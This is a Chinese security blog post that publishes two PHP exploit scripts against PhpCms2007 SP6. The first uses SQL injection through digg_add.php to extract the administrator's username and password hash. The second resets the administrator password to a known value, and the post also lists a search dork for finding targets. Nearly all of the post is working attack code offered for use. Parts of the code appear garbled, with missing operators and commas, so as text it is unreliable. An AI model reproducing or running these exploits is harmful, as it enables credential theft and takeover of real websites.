友情链接 简历博客首页
Oct
1

PhpCms2007 sp6 SQL injection 0day

黑客&安全
phpcms,exp
阅读:388

这个漏洞是我8月份发现的,当时写的exp只是get管理员的账号密码;但现在这个漏洞已经被他人发现并且公布,而且有了update管理员密码的利用,因此我公布我当时写的这个exp,庆祝国庆~

<?
print_r('
--------------------------------------------------------------------------------
PhpCms2007 sp6 "digg" SQL injection/admin credentials disclosure exploit
BY oldjun(www.oldjun.com)
Thx for flyh4t^_^
--------------------------------------------------------------------------------
');

if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path
host: target server (ip/hostname),without"http://"
path: path to phpcms
Example:
php '.$argv[0].' localhost /
--------------------------------------------------------------------------------
');
die;
}

function getrand($i)
{
 for($j=0;$j<=$i-1;$j++)
 {
  srand((double)microtime()*1000000);
  $randname=rand(!$j 10,9);
  $randnum.=$randname;
 }
 return $randnum;
}

function sendpacketii($packet)
{
global  $host$html;
$ock=fsockopen(gethostbyname($host),'80');
if (!$ock) {
echo 'No response from '.$host; die;
}
fputs($ock,$packet);
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$prefix="phpcms_";
$cookie="PHPSESSID=2456c055c52722efa1268504d07945f2";

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))
{echo 'Error... check the path!'; die;}

/*get   $prefix*/
$packet ="GET ".$path."digg/digg_add.php?con=2&digg_mod=product&id=1/**/union/**/select HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("in your SQL syntax",$html))
{
$temp=explode("From ",$html);
if(isset($temp[1])){$temp2=explode("product",$temp[1]);}
if($temp2[0])
$prefix=$temp2[0];
echo "[+]prefix -> ".$prefix."\n";
}
echo "[~]exploting now,plz waiting\r\n";

$packet ="GET ".$path."digg/digg_add.php?con=2&digg_mod=product&id=".getrand(6)."/**/union/**/all/**/select%201,2,3,concat(username,0x7C0D0A,password)%20from%20".$prefix."member%20where%20userid=1# HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (!eregi(chr(181).chr(227).chr(187).chr(247),$html))
{
echo $packet;
echo $html;
die("Exploit failed...");
}
else
{
$pattern="/<a href=\"\/(.*?)\">/si";
preg_match($pattern,$html,$pg);
$result=explode("|",$pg[1]);
print_r('
--------------------------------------------------------------------------------
[+]username -> '.$result[0].'
[+]password(md5 24λ) -> '.$result[1].'
--------------------------------------------------------------------------------
');
}
function is_hash($hash)
{
if (ereg("^[a-f0-9]{24}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($result[1])) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>

对于此漏洞可以有深层次的利用,附Ryat 贴出来可以update管理员密码的EXP:

<?php
print_r('
+---------------------------------------------------------------------------+
Phpcms 2007 SP6 reset admin password exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by Phpcms 2007"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc 4) {
        print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user
host:      target server (ip/hostname)
path:      path to phpcms
user:      admin login name
Example:
php '.$argv[0].' localhost /phpcms/ admin
+---------------------------------------------------------------------------+
');
        exit;
}

error_reporting(7);
ini_set('max_execution_time'0);

$host $argv[1];
$path $argv[2];
$user $argv[3];

$url 'http://'.$host.$path.'member/member.php?username='.$user;

send();

if (strpos(file_get_contents($url), 'puret_t') !== false)
        exit("Expoilt Success!\nAdmin New Password:\t123456\n");
else
        exit("Exploit Failed!\n");

function send()
{
        global $host$path$user;

        $cmd 'digg_mod=admin,(SELECT/**/1/**/AS/**/credit_on,0x'.bin2hex('1\',password=\'e10adc3949ba59abbe56e057f20f883e\',email=\'puret_t\',showemail=1
WHERE username=\''.$user.'\'#').'/**/AS/**/credit,0x'.bin2hex('\' UNION SELECT 1#').'/**/AS/**/editor)/**/AS/**/ryat/**/LIMIT/**/1%23&id=1&con=6';

        $message "POST ".$path."digg/digg_add.php  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "CLIENT-IP: ".time()."\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n\r\n";
        $message .= $cmd;

        $fp fsockopen($host80);
        fputs($fp$message);

        $resp '';

        while ($fp && !feof($fp))
                $resp .= fread($fp1024);

        return $resp;
}
?>

共有0条评论

NAME:

required

E-MAIL:

required, will not be published

HOMEPAGE:

CONTENT: